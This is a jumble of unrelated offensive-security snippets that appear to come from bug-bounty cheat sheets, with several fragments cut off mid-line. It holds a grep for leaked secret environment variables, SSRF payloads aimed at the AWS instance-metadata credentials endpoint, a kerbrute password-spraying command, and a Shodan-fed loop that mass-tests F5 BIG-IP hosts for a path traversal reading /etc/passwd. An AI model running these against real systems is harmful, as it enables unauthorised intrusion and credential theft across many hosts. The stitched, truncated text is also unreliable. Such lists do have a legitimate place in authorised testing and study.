cmd@fb:/tmp|❯ wc -l 15m_sub_wordlist.txt
15677820 15m_sub_wordlist.txt
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
cmd@fb:/tmp|❯ wc -l 15m_sub_wordlist.txt
15677820 15m_sub_wordlist.txt
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
strings -f -e s * | grep -i 'BROWSER_STACK_ACCESS_KEY=\|BROWSER_STACK_USERNAME=\|browserConnectionEnabled=\|BROWSERSTACK_ACCESS_KEY=\|CHROME_CLIENT_SECRET=\|CHROME_EXTENSION_ID=\|CHROME_REFRESH_TOKEN=\|CI_DEPLOY_PASSWORD=\|CI_DEPLOY_USER=\|CLOUDAMQP_URL=\|CLOUDANT_APPLIANCE_DATABASE=\|CLOUDANT_ARCHIVED_DATABASE=\|CLOUDANT_AUDITED_DATABASE=\|CLOUDANT_ORDER_DATABASE=\|CLOUDANT_PARSED_DATABASE=\|CLOUDANT_PASSWORD=\|CLOUDANT_PROCESSED_DATABASE=\|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN=\|CONTENTFUL_TEST_ORG_CMA_TOKEN=\|CONTENTFUL_V2_ACCESS_TOKEN=\|-DSELION_BROWSER_RUN_HEADLESS=\|-DSELION_DOWNLOAD_DEPENDENCIES=\|-DSELION_SELENIUM_RUN_LOCALLY=\|ELASTICSEARCH_PASSWORD=\|ELASTICSEARCH_USERNAME=\|EMAIL_NOTIFICATION=\|ENCRYPTION_PASSWORD=\|END_USER_PASSWORD=\|FBTOOLS_TARGET_PROJECT=\|FDfLgJkS3bKAdAU24AS5X8lmHUJB94=\|FEEDBACK_EMAIL_RECIPIENT=\|FEEDBACK_EMAIL_SENDER=\|FIREBASE_PROJECT_DEVELOP=\|FIREBASE_PROJECT_ID=\|FIREBASE_PROJECT=\|FIREBASE_SERVICE_ACCOUNT=\|FIREBASE_TOKEN=\|GH_NAME=\|GH_NEXT_OAUTH_CLIENT_ID=\|GH_NEXT_OAU |
# from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types | |
application/1d-interleaved-parityfec | |
application/3gpdash-qoe-report+xml | |
application/3gpp-ims+xml | |
application/a2l | |
application/activemessage | |
application/alto-costmap+json | |
application/alto-costmapfilter+json | |
application/alto-directory+json |
## IPv6 Tests | |
http://[::ffff:169.254.169.254] | |
http://[0:0:0:0:0:ffff:169.254.169.254] | |
## AWS | |
# Amazon Web Services (No Header Required) | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
cat urls | unfurl -u format %s://%d%p > unique && sort -uo unique unique && cat unique | unfurl -u domains | waybackurls | unfurl -u format %s://%d%p > wayurl && sort -uo wayurl wayurl | comm -1 -3 unique wayurl > final && rm urls && rm unique && rm wayurl && httpx -l final --status-code -silent --content-length | grep -i 200 |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done |
undefined | |
undef | |
null | |
NULL | |
(null) | |
nil | |
NIL | |
true | |
false | |
True |